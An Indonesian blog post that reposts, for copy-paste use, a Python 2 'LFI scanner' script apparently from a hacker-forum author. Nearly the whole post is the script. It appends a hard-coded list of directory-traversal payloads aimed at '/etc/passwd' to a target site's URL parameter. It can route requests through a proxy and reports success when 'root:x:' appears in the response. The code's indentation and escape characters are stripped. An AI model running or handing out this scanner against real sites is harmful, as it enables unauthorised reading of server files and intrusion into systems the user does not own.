ane coba posting dari tutorial om Kiddies nih...
Langsung aja Copas Codde Di bawah Ini..
#!/usr/bin/python
#author:kiddies A.k.A penter
#email:crasher_1412[at]yahoo[dot]com
#thanks:mywisdom,gunslinger_,petimati,flyff666,devilz_nongkrong,psyc0tr0n,dewa_n cc n you!!!
#community:Devilzc0de,whitecyber,indonesianhacker,antijasakom,jasakom,darkc0de,i ntern0t,netheroes(vires)
import sys, os, time, re, urllib2, socket, httplib
if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)
proxy = "None"
count = 0
if len(sys.argv) < 2 or len(sys.argv) > 4:
print "n|---------------------------------------------------------------|"
print "| crasher_1412[@]yahoo[dot]com |"
print "| LFI scanner python version |"
print "|---------------------------------------------------------------|n"
sys.exit(1)
for arg in sys.argv:
if arg == '-h' or arg == '--help' or arg == '-help':
print "n|-------------------------------------------------------------------------------|"
print "| crasher_1412[@]yahoo[dot]com |"
print "| LFI scanner python version |"
print "| Usage: lfi.py www.site.com |"
print "| Example: lfi.py http://website.com/make.php?id= |"
print "| Proxy: lfi.py http://website.com/make.php?id= -p PROXY |"
print "| Visit devilzc0de.org |"
print "|-------------------------------------------------------------------------------|n"
sys.exit(1)
elif arg == '-p':
proxy = sys.argv[count+1]
count += 1
lfis = ["/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"]
site = sys.argv[1]
if site[:4] != "http":
site = "http://"+site
if site[-1] != "=":
site = site + "="
print "n|---------------------------------------------------------------|"
print "| crasher_1412[@]yahoo[dot]com |"
print "| LFI scanner python version |"
print "|---------------------------------------------------------------|n"
print "n[-] %s" % time.strftime("%X")
print "-"*80
print "tttChecking for LFI"
print "-"*80
print "n[+] Target:",site
print "[+]",len(lfis),"LFI loaded..."
print "[+] Starting Scan...n"
try:
if proxy != "None":
print "n[+] Testing Proxy..."
pr = httplib.HTTPConnection(proxy)
pr.connect()
print "[+] Proxy:",proxy
print "[+] Building Handler"
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
else:
print "n[-] Proxy not given"
proxy_handler = ""
except(socket.timeout):
print "n[-] Proxy Timed Out"
sys.exit(1)
except(),msg:
print msg
print "n[-] Proxy Failed"
sys.exit(1)
for lfi in lfis:
print "[+] Checking:" ,site+lfi.replace("n","")
proxyfier = urllib2.build_opener(proxy_handler)
try:
check = proxyfier.open(site+lfi.replace("n", "")).read()
if re.findall("root:x:", check):
print "[+] w00t!,w00t!: ",lfi
else:
print "[-] Not Found: ",lfi
except(urllib2.HTTPError):
pass
except(KeyboardInterrupt, SystemExit):
raise
Buat Om Kiddies Thanks Banget ya Tutorialnya..
Jadi Ada Bahan Buat Pembelajaran Saya Yang Masih Newbie ini ^^
Tidak ada komentar:
Posting Komentar